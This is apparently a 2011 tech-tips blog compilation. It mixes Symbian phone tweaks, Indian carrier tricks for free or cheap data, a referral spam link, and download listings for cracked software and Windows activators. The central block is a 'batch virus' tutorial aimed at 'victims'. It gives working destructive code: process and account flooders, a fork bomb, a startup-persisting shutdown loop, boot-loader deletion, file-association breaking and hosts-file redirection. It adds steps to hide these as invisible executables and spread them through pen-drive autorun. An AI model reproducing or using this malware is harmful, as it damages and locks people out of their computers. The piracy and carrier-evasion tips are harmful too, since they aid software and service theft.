Monday, January 31, 2011

click the below link to earn money by reading mails

http://www.PaisaLive.com/register.asp?1474913-6034681 

GUiDE TO CHANGE FONTS

1. Symbian 9.1 supports and uses TTF and Openfasce TTF fonts!

2. Make a folder on your memory card as follows: [mem-card]Normally known as E:Resource/Fonts

3. Pick TTF font and rename apropriate files as described below

NOSNR60.ttf = Nokia Sans S60 Regular

NSSB60.ttf = Nokia Sans S60 SemiBold

NSTSB60.ttf = Nokia Sans S60 TitleSmBd S60

S60ZDIGI.ttf = Series 60 ZDigi / this one is just LCD digits 0-9 plus .:,;*?

4. Copy these to newly created folder (fonts folder)

5. Reboot phone

6. Enjoy!!!!!!!



---¤¤¤¤¤- -¤¤¤¤¤--- ---¤¤¤¤¤- -¤¤¤¤¤---



REMOVAL:

1. Use card reader [ONLY] to acces your memory card/sd card

2. Remove/delete files in E:Resource/fonts

3. Put your card back to phone

4. Reboot phone



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---

---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



Note:

* You can use any TTF in this purpose, but some TTF fonts are not supported special character such as %*][, etc

* Recomended is usage of hi-quality fonts which support full range of code pages

* Original fonts are stored in Z: drive

* For N93 user, rename as:

- NOSNRS60.ttf

- NOSSBS60.ttf

- NOTSBS60.ttf

- last one is the same as above

---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



Tested on N73 & N80, 100% working

change Any Icon of Installed App



GuiDE to change Any Icon of Installed App in C:/ or E:/

steps::



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



1. Open Xplore



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



2. Choose an app with the desired icon to change the original icon (for example best call recorder to change totalrecall icon)



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



3. Now go to e:/resource/apps



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



4. Look for the file called BCallRecorder_0x2000FE5A_aif.mif



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



5. name it to Totalrecall.mif (you must know the real app name in this case is like I wrote but can chage (sometimes could appear with UID:

BCallRecorder0x2000FE5A_aif)



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



6. Once you fond the file just replace it in C: or E:

esource\apps\paste it.



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---



7. go to you menu and voilá the BestCallRecorder icon is now a TotalRecall icon



---¤¤¤¤¤¤¤¤¤¤¤¤- -¤¤¤¤¤¤¤¤¤¤¤¤---


googletalk-setup-en-GB.exe



--File Details--


Name: googletalk-setup-en-GB.exe

Size: 1.28 MB

Added: 18.12.2010

Last Download By: Dabangkhan

Download: 2/57 x

[Download

Typing_Master_Pro_7



--File Details--


Name: Typing_Master_Pro_7.xx.zip

Size: 11.74 KB

Added: 15.1.2011

Last Download By: ikunal15

Download: 6/53 x

[Download]

Net_Protector_Antivirus_2011



--File Details--


Name: Net_Protector_Antivirus_2011_Cr_cker_by_GprsHub.com.zip

Size: 946.39 KB

Added: 19.1.2011

Last Download By: diwan7bist

Download: 12/159 x

[Download

CorelDRAW_Graphics_Suite_X4



--File Details--


Name: CorelDRAW_Graphics_Suite_X4_cr_ck_.rar

Size: 646.67 KB

Added: 30.1.2011

Last Download By: mdarifgkp

Download: 8/8 x

[Download]

Vista_Activator_All_Versions



--File Details--


Name: Vista_Activator_All_Versions_by_GprsHub.Com.rar

Size: 1.52 MB

Added: 30.1.2011

Last Download By: NISHA YUVI

Download: 17/20 x

[Download]

Avast Internet Security 5.0.677 with License Key



=> What's new in this version:

Version 5.0.677.100921 solves a problem that could lead to disappearing of the avast service.



How to Insert License File:

1. Open avast

2. Go to "Maintenance"

3. Click "Subscription"

4. Click "Insert License File"

5. Insert 1st License File and it'll be demo now

6. Now Insert 2nd License File and it'll be activated for 2013.

7. Enjoy Avast Internet Security 5.0.67 till 2013

WHAT IS A BATCH FILE



Hi freinds, today we could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, we have focused on making the basics of batch files clear and developing the approach to code your own viruses.




What are Batch Files?Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.

Now type these commands one by one



1. md x //makes directory 'x' on desktop

2. cd x // changes current directory to 'x'

3. md y // makes a directory 'y' in directory 'x'

Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat



Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?They can be used to delete the windows files, format data, steal information, irritate victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed

:x //loop variable

start winword

start mspaint //open paint

start notepad

start write

start cmd //open command prompt

start explorer

start control

start calc // open calculator

goto x // infinite loop



This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.



2. Folder flooder

@echo off

:x

md %random% // makes directory/folder.

goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

3.User account flooder

@echo off

:x

net user %random% /add //create user account

goto x

This code would start creating windows user accounts whose names could be any random numbers.

4.Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”

copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)

shutdown -s -t 00 //this will shutdown the computer in 0 seconds



Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup



Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.



5. Deleting boot files

Goto C drive in Win XP , Tools->Folder Option->View

Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to

delete this file from victim's computer and the windows will not start then.



attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively del ntldr //delete ntldr file



After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

6. Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

7. Extension Changer

@echo off

assoc .txt=anything // this command associates extension .txt with filetype anything.

assoc .exe=anything

assoc .jpeg=anything

assoc .png=anything

assoc .mpeg=anything



Every extension is associated with a file type like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.

Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wouldn’t open properly.

8. DNS Poisoning



There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.



@echo off

echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.

Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Viruses we just coded

Note : Most of the batch viruses are simply undetectable by any anitiviruses

Tip : Coding good viruses just depends on the DOS commands you know and logic you use.



Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.

2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.

first download this Batch To Exe coverter with the help of goggling .

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:



Step 1.

Open notepad and write

[autorun]

open=anything.bat

Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Friday, January 28, 2011

MOBILE NUMBER PORTABILITY(MNP)

.whats this

its new developement in tele communication where service provider can be changed without changing ur number



how to switch -rule

send a sms to 1900 as. PORT ie. PORT 9504XXXXXX.

u will recv a unique porting code through sms

U need to use this code in communication with new service provider for MPN switch.



Go to ur current service provider outlet n clear ur pending bills



Now go to ur new service provider outlet n apply for MPN programme n provide the unique porting code that u hv received through sms. Porting code hv some expiring time so use it as early as possible



New service provider will take approval 4m old one n process is initiated 4m here




KEYBOARD SHORTCUTS FOR NOKIA E71

E71 is one of Nokia's best phones to have hit the market and has often been labelled as the 'iPhone killer' or the 'BlackBerry killer'. We are not sure whether it has actually killed any of those but what we are sure of is that it is one of the best smartphones to have hit the market. We have for you here, a very expansive list of E71 tips, tricks and shortcuts. Enjoy!

GENERAL

* To get to a symbol or number hold down its key.

* Shift + Backspace deletes letters after the cursor, thus imitating the behaviour of the 'Delete' key on the computer.

* Fn + Ctrl + C to copy.

* Fn + Ctrl + V to paste.

* Shift + Left ( or Right ) to select text.

* Ctrl + Up for page up.

* Ctrl + Down for page down.

* Ctrl + Vowels ( or n ) for accented characters.

* In the Main Menu:

CAMERA

* T to focus.

GALLERY

* Green Call to send the image.

* Fn + * for full screen.

* Fn + 7 to zoom in. Press twice for the full screen size.

* Fn + 4 to scroll left while in the zoomed image.

* Fn + 5 to zoom in.

* Fn + 3 to rotate right.

* Fn + 2 to scroll up while in the zoomed image.

* Fn + 1 to rotate left.

* Fn + 0 to zoom out.

WEB

* 1 for bookmarks.

* 2 to find something on a page.

* 3 to return to the previous page.

* 5 to tab open windows.

* * to zoom in.

* # to zoom out.

* 8 for page overview.

* 9 to go to a different web page.

* 0 to got to the homepage.

* Hit the Backspace key to close the current window.

* on a QWERTZ keyboard: y - to go back one site

* on a QWERTY keyboard: z - to go back one site

STANDBY

* Hold * to activate/deactivate Bluetooth.

* Hold 0 to go to the web browser.

* Left Soft Key then Fn ( or * ) locks the keypad.

* Hold End/Red to disconnect all data connections.

* Hold Left Soft Key to read out new text messages.

* Hold shift + soft key LEFT to copy

* Hold shift + soft key RIGHT to paste

MAIL

* Shift + Return to mark/unmark a single message.

* Shift + Down to mark multiple items.

* Fn + Spacebar in new message body to access input (predictive text, etc.) options.

MAPS

* Shift to zoom in.

* Backspace to zoom out.

* Space to go to the current position.

REAL PLAYER

* Fn + 2 for full screen.

* Hold Up for fast forward.

* Hold Down for rewind.



STICKY FUNCTION KEY

A quick double press on the bottom left 'function' key locks it. This is helpful in situations when you need to press a combination of keys or in applications like Gmail which can be controlled via the keypad.

1-800-WHATEVER

To dial 1-800-WHATEVER: type 1800, hit Fn, then Shift twice, type WHATEVER, and press the Call/Green key to dial. (The idea is to type in the alphabet mode in CAPITAL letters ONLY). The alphabets will automatically be converted to numbers.

ONE TOUCH MUTE

You can simply mute a call by press the button between the volume keys present on the right hand side of the phone. Press it again to cancel the mute.

REMAP THE KEYS

There are times when you feel certain keys on the E71 are being wasted when they could have come in very handy. For example, the volume keys would work wonderfully with the web browser to scroll pages or in your music player and the mute key could work as select. Make that happen.

TIME & DATE

When the phone is in the locked state and the screen is blank, hit the Navi Button to display the time and date in a large font.[/s3]

TEXT MESSAGES

[i]When in the standby mode, hold down left soft key to read out new text messages.

ASSIGN SHORTCUTS

If you have a lot of applications installed on your E71, you might want to assign additional shortcuts to different applications by defining a set of keypresses with an application called Cute Keys..




TRANSFER MESSAGES

.Hi guys today I get an way to transfer my messages from N70 to N73.

I dont know why you all guys doesnt posted it here is the trick.



1.First of all make sure you have chosen mmc as message storage ever if not do it now if it ask to copy press no.

2.Then get the"Mail"folder of S60V2 handset and copy it to P.C.

3.You will get that folder from {!:systemmail Where ! is drive you choosed}

4.Now connect your S60V3 handset to pc via cable in data transfer mode {you must have to change message memory to phone memory}

5.Once connected go to {!:private1000484b Where ! is your MMC drive at P.C.}

6.Now open the folder mail of S60V2 Handset that you had just copied to P.C. and select the content of it and paste in the folder of S60V3 handset that is {!:private1000484b Where ! is your MMC drive at P.C.}.

7.Now replace all file when it prompt.

8.Its done now.. disconnect your handset and change your message memory to Memory card

9.If you followed every thing you will be successful.



[NOTE:- Dont copy paste the whole "mail" folder of S60V2 handset and rename it to mail2 it will fail just copy all files inside it and paste inside "mail2" folder].




NOKIA 5800 TIPS

To bring out the Shortcuts on your Screen/Desktop-> Settings/Personal/Home Screen/Home Screen Theme and select Shortcut bar, you can then select which shortcut to display if goto "Shortcuts". This will also bring out the "Track" playing being displayed when you open the Music Player.

2. Tap the Clock to bring out the Clock menu and make your alarm, alarm repeat is now built-in.

3. Tap the "General" or Date (the set Profile besides the clock) and the Profile selection menu pops out, almost similar to pressing the "Power" button in all S60, but here the Remove memory is not shown, but "Calendar" shortcut is included and the other profiles as well.

4. If you are on the Numeric Keypad, pressing the [#] key alternately will toggle the General and Silent Profiles, same as before, which means long press on zero [0] will bring out bookmarks for the Web.

5. Tapping on the displayed To do or Calendar entry will bring you immediately to that particular item.

6. Tapping the Active Icon on the Top Left (near the battery indicator) will give you shortcuts for any of the active icons.

7. Long press on the Green Call Button will still activate the Voice Command Prompt

8. Long press on the center button is similar to the Long press on the "Menu" key (the yin-yang key on most S60) which will bring out the menu for all the active applications.

9. Go to Applications/File Manager and setup "Backup" for automated backup schedule of your phone data.

10. How to update your Nokia 5800 firmware using your phone.

Presss *#0000# to display phone factory information and firmware

Now press options and select check for updates.

The newest update is sent to your phone from nokia.

Download and install updates.

This is done using GPRS or WIFI Connectivity..




Acces to Private and SYS folder on your MMC without PC for Unhacked phones

Little trick

1)Via cardreader or data transfer remove readonly attribute from sys and private folders

2) Open pre installed fileman

3) Functions - Search(find)

4) Enter private or sys

5) Wait

6) Enjoy



P.S sys is readonly

Some folders

10207114 - Themes

102033E6 - Java Applications

1000484b - Mail folder

10202dce - Installed sis file

Steps:

* Press menu key, open "File Mgr." (the default file manager) and open it

Press Options / Find

You will be prompted to choose between phone memory and memory card. Press down to select memory card.

* Type the name of that protected folder you want to browse through: either Sys or Private

* Press Find and wait

The folder will appear in search results. It should appear the first result if you type its whole name.

What will you be able to do?

* Browse through folders, subfolders and files inside sys folder.

* Copy files/folders from sys to another normal folder

* Browse through folders, subfolders and files inside private folder

* Move and copy files/folders from private folder to another normal folder

* Rename and delete files/folders inside private folder.




tweaks Nokia N95 battery life

There is no way getting around the fact battery life on the Nokia N95 is less than great. Almost every N95 review addresses this issue in one way or the other. Opinions seem to range from infuriated "Nokia should provide a more powerful battery for this type of device" to apologetic "a communication and multi media power house is bound to run its battery dry in no time".

Whatever the case may be, there are things that can be done to improve upon the «default» N95 battery life time. Improvements come from tweaking a few, selected settings from their default values.

I have divided this authoritative N95 battery tweaking guide into two parts: first I will show you a few basic battery friendly optimizations and habits that can be employed by everyone. Next, I provide a few advanced tweaks that on the one hand might not fit everybody, on the other hand result in the most significant improvements.



Basic Optimizations

Update phone firmware- new firmware might include improvements to battery management.

Bluetooth - keep it off unless needed. Put bluetooth management on «active standby» screen for easy access («Tools» | «Settings» | «General» | «Personalisation» | «Standby mode» | «Active standby apps..»).

Brightness timeout...not more than 10 seconds («Tools» | «Settings» | «General» | «Personalisation» | «Display» | «Light time-out»).

Screen brightness - turn it down a notch or two («Tools» | «Settings» | «General» | «Personalisation» | «Display» | «Light sensor»).

Lower the standby timeout - mine's set to 1 minute («Tools» | «Settings» | «General» | «Personalisation» | «Display» | «Power saver time-out»).

Camera - do not walk around with "live" viewfinder 1.

Rocket Science Tweaks

WLAN scanning - turn it off...scan manually, or turn scanning on when needed («Tools» | «Settings» | «Connection» | «Wireless LAN» | «Scan for networks»).

3G - turn it off - especially in areas with poor coverage, where the N95 otherwise will spend stupefying amounts of power searching for networks («Tools» | «Settings» | «Phone» | «Network» | Set «Network mode» to «GSM»).

WLAN transmit power (TX power level) - turn it down to, say, 4 mW. («Tools» | «Settings» | «Connection» | «Wireless LAN» | «Options» | «Advanced settings» -say YES to the prompt - scroll down to TX power level choose options/change/ and select 4 mW.).




GUIDE TO BACKUP A PHONE

Here is guide to back up many things on your hacked phones.

New phone? Hard reset? Firmware upgrade? Or you just want to be prepared for just in case? Of course you can backup all kinds of things on your phone with PC Suite or the backup feature of the data manager on your phone, but that takes forever, requires a computer (PC Suite), and won’t let you choose what to backup (data manager).







But if you hack your phone to set it free and get full access to all system folders, you can backup exactly what you want.



REQUIREMENTS: All you need is a hacked phone, and a decent file manager like ActiveFile, X-Plore, SExplorer, FExplorer, or Y-Browser.















Access Points:



Your access points are stored in C:Private10202be9persistscccccc00.cre. Just make a copy of cccccc00.cre, and restore it to your phone (or send it to another phone), restart your phone, and you have your access point settings back just the way they were when you made the backup.







Bluetooth:



Your bluetooth name is in C:Private10202be9persists10204dac.cre, your paired devices are in C:Private100012a5DBS_100069CC_btregistry







Bookmarks:



The bookmarks of Symbian’s built-in web browser are stored in C:Private100012a5DBS_101FD685_BrowserBookmarks.db.







Calendar:



Calendar entries are stored in C:Private10003a5bCalendar. On some phones the folder name is 1000395b.







Contacts:



Your contacts database is in C:Private100012a5DBS_100065FF_Contacts.cdb.



On some phones the folder name is 10001295.







Cookies:



The cookies of Symbian’s built-in web browser are in C:Private101f8530cookies.dat. Restart your phone after restoring or transfering the cookies file. If you’ve told your browser to delete your cookies, there is no cookies.dat file in C:Private101f8530.







Messages:



Your SMSs and mails from Symbian’s built-in messaging application are stored in C:Private1000484b. If you’ve told your phone to store messages on your memory card, they are in E:Private1000484b. Copy the entire folder, and restore when needed.







Notes:



The notes you write in Symbian’s Notes application are stored in C:Private100012a5DBS_101F8878_Notepad.dat.



If you can’t delete or replace the file, it’s because Symbian is using it. But there’s a workaround for this problem: go to settings, data manager, memory, and select “back up phone memory” from the options menu. While your phone is making the backup, you can delete or replace the DBS_101F8878_Notepad.dat file.







Profiles:



Your profiles are stored in C:Private10202be9persists101f8798.cre. If you restore the backup, restart your phone.







T9 dictionary:



Your frequently used words in SMS and email are stored in C:Predic101F8615_F.dat. You don’t even need to hack your phone to get into this folder.




GET RID OF ''PHONE MEMORY FULL'' PROBLEM

Here is how to get rid of phone memory full problem on n73

Having phone memory full is realy annoying, you cant do anything. Just keep on getting 'Memory Full!' . I had this problem on my N73me but I didnt knew this solution at that time. I thought it is some kind of virus so I hard formated my phone memory. Well if you or any of your frlends is having this problem, the good news is that its not cause of any virus and you dont have to format your phone to get this fixed. . I recomend that you do this on your phone even if you are not having this problem at the moment.



Lots of talking, Now lets come to the point. This problem is caused by application LIFEBLOG. This applications keeps copy of many things like your messages, camera photos, camera video's . . . . .bla,bla. . . . So what we have to do is just disable it. And its easy and no hack is required.







Here is what you have to do...



First you should have minimum of 150 KB free memory in your phone… its enough to open the Application







Then open the Application-->Lifeblog-->option-->settings--> item types--> unmark all the items… then restart your mobile…. whiles start up… the lifeblog application will clean up the database and your phone memory will back to normal….




MOBILE COOL TIPS

1.Here is how you can turn camera sound off on your hacked phone.

1. Open xplore



2. Goto z:private10202be9101f8809.txt



3. Copy the file to c:private10202be9101f8809.txt



4. Edit the file 101f8809.txt



5. At the end of the file, u will find the line



code: 0*7 int 1 0 cap_rd=alwayspass cap_wr=alwaysfail



6. Change it to



code: 0*7 int 0 0 cap_rd=alwayspass cap_wr=alwaysfail



7. Save the file and exit xplore



8. Turn on caps on



9. Turn off warning tones in ur profile



10. Restart the phone



NO MORE SOUNDS IN CAMERA!!!



Tested on: n73me, 5700, 6120c, n95-1 and n 78. Should work on almost all s60v3 phones. Try it on your phone and then inform.




FUNNY TRICKS

Google Trick

Go to

www.googlegooglegooglegoogle.com

You can access Four Google search Engines at one page.



2>

Shutting down 100 times faster:

Press ctrl+alt+del

open task Manager

click the shutdown Tab.

While holding ctrl key,

Press TURN OFF.



3>

Load ur folders faster:

>Tools

>Folder options

>View

>Automatically search for network folders and printers

>Don't cache thumbnails.



4>

Unwanted apps starts on each boot?

Do dis

press win+r

type msconfig

press enter

& on start up tab uncheck unwanted app list.

That's it!




BSNL 2G TRICK


.Use this one at low balance







proxy addres 10.220.67.131





port 8080





apn bsnllive





home page http://gooile.com






BSNL 3G Trick 2011


.Here is a 100 % working trick to unlimited use BSNL 3G at the cost of

Normal GPRS




First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.

now activate gprs by sending sms GPRS PRE to 53733 It will be

actrivated in 24 hours, after activation get gprs settings by calling c.care



Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)

in it, After activation You have to chnage only one thing in yor 3G enabled cell.




Go to settings>tools>settings>phone&g

t;network>network mode> now select UMTS



THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name,select it as default





Now see your data singnals logo..... vola it is converted into 3G

You will get near about 500kbps to 1200 kbps speed

Remember use BSNLEGPRS or BSNLPREPAID as ur access point






vodafone 3g

.Vodaphone is going to launch 3G services in this feb. Or march in 9 circles with exciting offers

circles are

Delhi

Mumbai

Kolkata

Chennai n Tamilnadu

Maharastra n Goa

Gujrat

Haryana

Up east

Weast bangal





3G data plan:

Rs 499 : 10GB

Rs 699 : 15GB

Rs 899 : unlimited




~HOW TO INCREASE VALIDITY OF Rs.99/29 PLAN~

1.Hi Friend HowZ U???



Just Type



Unsub 2084



and send it to155223



Rs. 99 Plan.

They Deactivate Your Plan But You DoNot Loose Your Mb.

So Re Activate Plan With Previous Method.

And Enjoy Extend Validity And Mb.

~FULL FREE CALL+SMS+MRADIO+UNLIMITD+MORE SERVICES

1.This trick is working in haryana. Yeh trick shirf "RCOMNET" user kliye hai jo Reliance Rs.99 wala net use kr rahe hai. And its nt working 4 other.but u can try.oknow the trick is...Use access point Rcomnet. Net use krte waqt kavi b net automatic diconect ho jaye or connet karne par "SERVISH NOT SPORTED" aaye aisa 1-2 din me shirf 1 ya 2 baar aata hai. And me try 9am&3pm. Anyway kavi b aisa to us waqt CALL&SMS freehogi anywhere in india. Or ur balance hona chahiye Rs.1. Nt working in 0 bal. Also call 9317093170(toll free) then press# for main menu then u can downld unlimitd cullartone free. Also u can subcribe sms packs or agr koi recharge pack activate krwana h to uske liye utna bal hona chiye wo activateho jaega pr bal nhi ktega. Call 51234600(tol fre) nd u can subcribe RELIANCE MUSIC GOLD PACK.so enjoy its working in haryana.Note- net use krte waqt jb"SERVISH NOT SPORTED" aye usi waqt try krna.or haan us waqt ACCOUNT RECHARGE NHI HOTA SO TRY TO RECHARGE UR ACOUNT U C "PLEASE CALL C.C" thats trick is working 4 u.

EGYPT INTERNET SERVICES...SWITCHED OFF...!!! *BREAKING



28 th Jan 2011
Egypt has cut off nearly all Internet traffic into and out of the country in the largest blackout of its kind, according to firms that monitor international data flows. Cellphone networks were also disrupted.



Vodafone said in a statement on its Web site that "all mobile operators in Egypt have been instructed to suspend services in selected areas." The company said it was "obliged to comply" with the order.



Egypt has been trying to contain growing protests that have been fueled in part by videos and other information shared over social networks like Facebook and Twitter. text:



Renesys, a Vermont- based company that tracks Internet traffic, said that just after midnight Cairo time, or 5 p.m. New York time, Egyptian authorities had succeeded in shutting down the country's international access points. "Almost nobody in Egypt has Internet connectivity, and there are no workarounds," said Jim Cowie, the company's chief technology officer.



"I've never seen it happen at this scale." "In a fundamental sense, it's as if you rewrote the map and they are no longer a country," said Mr. Cowie. "I never thought it would happen to a country the size and scale of Egypt." text:



In most countries, the points of access to the global Internet infrastructure are many and distributed. But Mr. Cowie said that Egypt was relatively late in widely adopting the Internet, so it has fewer access points.



The government can shut these down with "six, or even four phone calls," he said.



A Facebook spokesman, Andrew Noyes, said the company had seen a drop in traffic from Egypt since Thursday. "Although the turmoil in Egypt is a matter for the Egyptian people and their government to resolve, limiting Internet access for millions of people is a matter of concern for the global community," he said in a statement.



In an interview, Mr. Noyes said the company was still seeing some traffic coming in from Egypt, but that it was "minimal."

How Antivirus Software identifies threats



Most of us are aware how Antivirus Works and updates. As ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer. Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works and updates.

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs.



1. Signature-based detection – Dictionary based

2. Heuristic-based detection – Suspicious behavior based

1. Signature-based detection – Dictionary based



This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk.



As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants, so that the virus can be analyzed and the signature can be added to the dictionary.



More and regular the updates more secure we are.



2. Heuristic-based detection Suspicious behavior based



Heuristic-based detection involves identifying suspicious behavior from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software’s to identify new malware and variants of known malware. Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.



File emulation- This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.



How to check your anti virus weather it does the work you haired it for?



European Institute of Computer Antivirus Research – EICAR Test makes it easy. It is a common test and most of us can perform it right now!

1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad. EICAR Test Code:
1.

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to mynewfile.com

3. Now run the antivirus scan on this mynewfile.com file.
If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise find a new one.


3200 Gmail Accounts Of Girls trapped And Stolen For Nude Photos


* George Bronk was hacked into more than 3,200 email accounts looking for nude or compromising photos. He then posted many of these photos to his victims' Facebook pages. George Bronk is just the 23-year old and live in California, has pleased guilty to hacking into the email accounts of 3,200 girls and posting the nude pictures to their public Facebook profiles.



* George Bronk was arrested in late October 2010 after he used the same technique that was popularized by hacker David Kernell to break into Sarah Palin’s email. Namely, Bronk scoured his victims’ Facebook accounts looking for the answers to security questions used for password recovery by services like Gmail and Yahoo Mail.



* Once he had access to an email account, he search for nude photographs sent by the account holder, then trigger a Facebook password recovery to get into their account and post the pictures live to their profiles. He post nude photographs to over 172 women. He even convinced one woman to send him even more explicit photos of herself by threatening to post the ones he’d already stolen if she didn’t. 




* Court charge six years in prison to George Bronk for felony hacking, child pornography as several of the girls were minors and identity theft charges.

lock folders using xplorer



Yup now it is easy to lock folders without using of any application all u need is an xplore thats it... Now lets start...

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

1. open xplore

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

2. scroll to that folder which u want to lock

eg.. "Others " u want to lock this folder...

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

3. the trick is that just U have to just rename the folder

eg.. "Others" just rename it by pressing 7 in xplore

rename it like this

( others____. )

"_"this means leaving 2 to 3 spaces by pressing 0 key as u do to give spaces.. Then a dot(.) then press ok to rename

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

4. Then exit xplore or close the all drop down list

voíla the folder will be locked...

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

5. AnD FCOURSE 4 UNLOCKING IT RENAME IT AGAIN TO OTHERS AND PRESS OK... Then exit xplore or close all drop down list..



---¤¤¤¤¤¤- -¤¤¤¤¤¤---
NoTE::- THIS TRICK WILL WORK IN

SYMBIAN 8.1..,.9.1.,and.9.2 phones i.e n70 and n72...and all s60v3 phones Only..

not in symbian 6,7,8 phones

Yup now it is easy to lock folders without using of any application all u need is an xplore thats it... Now lets start...

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

1. open xplore

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

2. scroll to that folder which u want to lock

eg.. "Others " u want to lock this folder...

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

3. the trick is that just U have to just rename the folder

eg.. "Others" just rename it by pressing 7 in xplore

rename it like this

( others____. )

"_"this means leaving 2 to 3 spaces by pressing 0 key as u do to give spaces.. Then a dot(.) then press ok to rename

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

4. Then exit xplore or close the all drop down list

voíla the folder will be locked...

---¤¤¤¤¤¤- -¤¤¤¤¤¤---

5. AnD FCOURSE 4 UNLOCKING IT RENAME IT AGAIN TO OTHERS AND PRESS OK... Then exit xplore or close all drop down list..



---¤¤¤¤¤¤- -¤¤¤¤¤¤---
NoTE::- THIS TRICK WILL WORK IN

